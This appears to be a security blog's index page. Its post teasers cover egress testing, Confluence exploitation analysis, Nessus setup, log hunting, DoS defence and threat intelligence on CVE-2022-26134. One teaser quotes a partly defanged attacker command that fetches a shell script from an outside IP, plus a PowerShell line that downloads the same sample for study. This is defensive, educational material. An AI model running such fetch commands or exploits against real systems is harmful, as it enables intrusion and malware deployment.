Guides
Have you ever wanted to run a quick test of egress ports from userland from a windows machine?
Well worry not, I didn’t even have to write anything, the nice people at Black Hills security have done it for us. However I did decide that there’s a few other things we might want to do, so I made a quick modification, now we have colours, randomisation and some sleeps.
Read more “Testing Risky Egress Ports”
Education
I’m totally in the middle of doing some work but this alert just came in so I have quickly dumped the data:
This came in via a Confluence exploit (not sure which CVE yet). I’ve not got time to analyse but thought I’d share this as an educational excercise for people! It’s a good excercise to see the apache tomcat logs and then decode, obtain samples and analyse the activity/imapct (as well as yoink IOCs etc.)
Read more “Learn to SOC: Cryptominer Analysis”
Education
You can deploy Nessus in a range of ways, from direct install through to using a cloud-based deployment or virtual appliance.
A common reason for deploying on Kali or other distro rather than using the virtual appliance is for mobility, ease of use but also you might want to VPN or proxy traffic.
The install process is simple, log into your account on tenable community portal and download the relevant installation package.
Read more “Installing Nessus Pro on Kali Linux”
Guides
Work in progress post
Ok so i posted a snipped of PowerShell on LinkedIn for hunting the confluence logs using a pattern match for ${ (after we have URL decoded (twice). This is just an example of how to parse log files using PS1 so it’s clearly very basic but i wanted to give people an idea of what we do when we “GREP” the logs:
Read more “Searching Confluence Logs with PowerShell”
Education
The guidance here is also useful with a post on parsing Confluence logs for an RCE using OGNL injection.
The contents of this blog if executed could get you ransomwared so maybe be careful (I’ll de-fang some bits so if you are having issues following along fix the fangs, plus the payloads will get taken down)
To support a high levle view here is the rough stages that would occur in a successful deployment by a threat actor against a vulnerable target:
Find servers with Confluence that aren’t patched.
Send Log4J Exploit with Stage0 payload
Guides
According to NIST, a denial of service (DoS) is:
“The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided).”
denial of service (DoS) – Glossary | CSRC (nist.gov)
a distributed denial of service (DDoS) is:
“A denial of service technique that uses numerous hosts to perform the attack.”
distributed denial of service (DDoS) – Glossary | CSRC (nist.gov)
Read more “Defending against Denial of Service (DoS) Attacks”
Guides
If you want to keep up with the world of cyber security the fastest place is twitter, however that’s not the only place and whilst tweetdeck and twitter itself are incredible useful, you also are going to want to check out other areas. Inspired by a friend’s tool I thought I’d just knock up a list of sites that have useful cyber security information on:
Read more “Useful Security News Sites and Blogs”
Education
Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:
HTTP Command Executes this:
curl http[:]//202.28.229.174/ap[.]sh?confcurlThis download the following (ap.sh)
$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing
$stealz.Content | Out-File ap.txt
Education
Useful for a range of defensive and offensive purposes, internet asset search platforms enable a range of activities from:
Each has its own interfaces, features, dataset sand styles.
I’ve put together a list of the most popular, there may be more that I haven’t listed.
Read more “Passive Port Scanners & Internet Asset Discovery Platforms”
Threat Intel
We are seeing active exploitation in the wild: MIRAI deployment, coinminer deployments etc.
THIS DOES SHOW IN THE ACCESS LOGS! The comment about “what isn’t in the logs” is about POST request BODY not showing in them, not that nothing is logged
XMRIG, KINSING, MIRAI etc. are being deployed by threat actors after exploiting this vulnerability.
This is a fast publish
POC is in the wild: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
https://github.com/jbaines-r7/through_the_wire
keep checking vendor guidance and keep checking this for updates… use at own risk etc.
Workaround/Hotfixes have been published by Atlassian:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
https://jira.atlassian.com/browse/CONFSERVER-79000
GreyNoise Tag is online: GreyNoise Trends
Also check this out for scanners: GreyNoise
Nice work https://twitter.com/_mattata and all the other people in the cyber community that are working on this!
IT MAY BE WISE TO ASSUME BREACH
The vulnerability appears to be in: xwork-1.0.3-atlassian-10.jar
Velocity discovers a zero-day in confluence 03/06/2022 (GMT)